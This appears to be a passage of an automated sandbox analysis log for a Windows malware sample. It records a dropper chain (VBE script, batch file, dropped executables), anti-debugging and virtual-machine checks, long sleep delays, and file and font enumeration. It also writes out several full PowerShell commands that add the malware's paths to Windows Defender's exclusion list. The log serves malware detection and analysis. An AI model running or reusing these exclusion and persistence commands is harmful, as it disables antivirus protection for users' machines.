                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe TID: 7828Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\hyperContaineragent\Bridgecommon.exe TID: 7148Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe TID: 5052Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\hyperContaineragent\Bridgecommon.exe TID: 7944Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe TID: 7624Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\hyperContaineragent\Bridgecommon.exe TID: 6072Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CAA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00CAA69B
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CBC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00CBC220
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CBE6A3 VirtualQuery,GetSystemInfo,0_2_00CBE6A3
                                    Source: C:\hyperContaineragent\Bridgecommon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 30000
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 600000
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile opened: C:\Users\user
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile opened: C:\Users\user\Documents\desktop.ini
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile opened: C:\Users\user\AppData
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile opened: C:\Users\user\AppData\Local\Temp
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile opened: C:\Users\user\Desktop\desktop.ini
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile opened: C:\Users\user\AppData\Local
                                    Source: wscript.exe, 00000001.00000003.1860581072.000000000302C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: Bridgecommon.exe, 00000005.00000002.1978082976.000000001C62E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                                    Source: Bridgecommon.exe, 00000005.00000002.1979197436.000000001C661000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA
                                    Source: w32tm.exe, 00000030.00000002.1976106969.00000191C2818000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeAPI call chain: ExitProcess graph end nodegraph_0-25001
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information queried: ProcessInformation
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CBF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CBF838
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CC7DEE mov eax, dword ptr fs:[00000030h]0_2_00CC7DEE
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CCC030 GetProcessHeap,0_2_00CCC030
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeProcess token adjusted: Debug
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CBF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CBF838
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CBF9D5 SetUnhandledExceptionFilter,0_2_00CBF9D5
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CBFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00CBFBCA
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CC8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CC8EBD
                                    Source: C:\hyperContaineragent\Bridgecommon.exeMemory allocated: page read and write | page guard

                                    HIPS / PFW / Operating System Protection Evasion

                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe'
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\en-GB\nFQRHbQjcuhfqIAubZpdQD.exe'
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe'
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\nFQRHbQjcuhfqIAubZpdQD.exe'
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe'
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\hyperContaineragent\Bridgecommon.exe'
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\hyperContaineragent\6TX15s3o3dST68MJkEj7bgGxU9zvefDuKPar5COcqC66esPk.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\hyperContaineragent\CYWN6IDJqLBtl0YjSrMSw1hYURgrvXzRLx.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\hyperContaineragent\Bridgecommon.exe "C:\hyperContaineragent/Bridgecommon.exe"
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ih0xhhgm\ih0xhhgm.cmdline"
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gMEBPrHPbx.bat"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA4DA.tmp" "c:\Windows\System32\CSCA1C1A0ABC4644F3ABFA5FB833E2CF3E.TMP"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe "C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe"
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CBF654 cpuid 0_2_00CBF654
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00CBAF0F
                                    Source: C:\hyperContaineragent\Bridgecommon.exeQueries volume information: C:\hyperContaineragent\Bridgecommon.exe VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                                    Source: C:\hyperContaineragent\Bridgecommon.exe Queries volume information: C:\hyperContaineragent\Bridgecommon.exe VolumeInformation
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe Queries volume information: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe Queries volume information: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
